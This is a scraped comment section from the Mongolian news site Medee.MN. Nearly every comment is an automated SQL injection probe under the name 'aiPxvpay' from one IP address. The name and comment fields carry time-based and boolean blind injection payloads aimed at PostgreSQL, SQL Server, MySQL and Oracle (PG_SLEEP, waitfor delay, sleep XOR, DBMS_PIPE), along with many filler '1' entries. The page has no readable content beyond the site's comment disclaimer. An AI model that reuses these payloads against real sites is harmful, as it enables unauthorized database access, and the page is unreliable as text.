aiPxvpay [-1' OR 2+601-601-1=0+0+0+1 -- ] 2022-07-10 23:07:22

1

aiPxvpay [-1 OR 2+444-444-1=0+0+0+1] 2022-07-10 23:07:22

1

aiPxvpay [-1 OR 2+960-960-1=0+0+0+1 -- ] 2022-07-10 23:07:22

1

aiPxvpay [mdJ0g1wi] 2022-07-10 23:07:21

1

aiPxvpay [196.196.203.214] 2022-07-10 23:07:09

1

aiPxvpay [196.196.203.214] 2022-07-10 23:06:58

1

aiPxvpay [196.196.203.214] 2022-07-10 23:06:45

1

aiPxvpay [196.196.203.214] 2022-07-10 23:06:32

1

aiPxvpay [196.196.203.214] 2022-07-10 23:03:12

1

aiPxvpay [196.196.203.214] 2022-07-10 23:03:00

1

aiPxvpay [196.196.203.214] 2022-07-10 23:02:47

1

aiPxvpay [196.196.203.214] 2022-07-10 23:02:35

1

aiPxvpay [196.196.203.214] 2022-07-10 22:59:45

1

aiPxvpay [196.196.203.214] 2022-07-10 22:59:32

1

aiPxvpay [196.196.203.214] 2022-07-10 22:59:13

1

aiPxvpay [196.196.203.214] 2022-07-10 22:59:01

1

aiPxvpay [196.196.203.214] 2022-07-10 22:58:48

@@Djb9C

aiPxvpay [196.196.203.214] 2022-07-10 22:58:48

1

aiPxvpay [196.196.203.214] 2022-07-10 22:58:47

1'"

aiPxvpay [196.196.203.214] 2022-07-10 22:58:47

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

aiPxvpay [196.196.203.214] 2022-07-10 22:58:34

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

aiPxvpay [196.196.203.214] 2022-07-10 22:58:22

uYbbSvOM')) OR 330=(SELECT 330 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:58:10

QgAWYZId') OR 811=(SELECT 811 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:57:58

pDS5h5gb' OR 895=(SELECT 895 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:57:45

-1)) OR 449=(SELECT 449 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:57:34

-5) OR 932=(SELECT 932 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:57:21

-5 OR 558=(SELECT 558 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 22:57:10

tjTLeCf4'; waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 22:56:57

1 waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 22:56:45

-1); waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 22:56:31

-1; waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 22:56:18

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

aiPxvpay [196.196.203.214] 2022-07-10 22:56:06

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

aiPxvpay [196.196.203.214] 2022-07-10 22:55:53

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

aiPxvpay [196.196.203.214] 2022-07-10 22:55:41

if(now()=sysdate(),sleep(15),0)

aiPxvpay [196.196.203.214] 2022-07-10 22:55:28

-1" OR 2+335-335-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 22:55:28

-1' OR 2+603-603-1=0+0+0+1 or '6CIGDHIX'='

aiPxvpay [196.196.203.214] 2022-07-10 22:55:27

-1' OR 2+989-989-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 22:55:27

-1 OR 2+873-873-1=0+0+0+1

aiPxvpay [196.196.203.214] 2022-07-10 22:55:27

-1 OR 2+103-103-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 22:55:26

yqNVtO6N

aiPxvpay [196.196.203.214] 2022-07-10 22:55:13

1

aiPxvpay [196.196.203.214] 2022-07-10 22:54:59

1

@@V6PiQ [196.196.203.214] 2022-07-10 22:54:46

1

1 [196.196.203.214] 2022-07-10 22:54:46

1

1'" [196.196.203.214] 2022-07-10 22:54:46

1

aiPxvpay'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-10 22:54:45

1

lSTHX2H8')) OR 880=(SELECT 880 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:54:33

1

Wc8vzg3G') OR 520=(SELECT 520 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:54:20

1

KZV6tqj6' OR 255=(SELECT 255 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:54:08

1

PHClPe99'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:53:54

1

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:53:40

1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-10 22:53:28

1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-10 22:53:15

1

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-10 22:53:02

1

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-10 22:52:49

1

-1" OR 2+619-619-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:52:37

1

-1' OR 2+587-587-1=0+0+0+1 or 'ML2qKNku'=' [196.196.203.214] 2022-07-10 22:52:36

1

-1' OR 2+225-225-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:52:36

1

-1 OR 2+369-369-1=0+0+0+1 [196.196.203.214] 2022-07-10 22:52:36

1

-1 OR 2+264-264-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:52:35

1

eoToriYB [196.196.203.214] 2022-07-10 22:52:35

1

aiPxvpay [196.196.203.214] 2022-07-10 22:52:21

1

aiPxvpay [196.196.203.214] 2022-07-10 22:52:07

1

aiPxvpay [196.196.203.214] 2022-07-10 22:49:18

1

aiPxvpay [196.196.203.214] 2022-07-10 22:49:05

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:32

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:32

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:32

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:32

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:32

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:32

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:31

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:31

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:31

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:31

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:31

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:31

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:31

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:31

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:31

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:31

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:31

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:31

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:31

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:30

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:30

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:30

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:30

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:30

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:30

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:30

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:30

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:30

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:30

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:30

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:29

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:29

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:29

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:29

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:29

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:29

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:29

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:29

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:29

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:29

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:29

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:29

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:29

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:29

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:28

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:28

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:28

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:28

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:28

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:28

1


442 сэтгэгдэл байна
1000 тэмдэгт оруулах үлдлээ.
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.
442 сэтгэгдэл байна
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.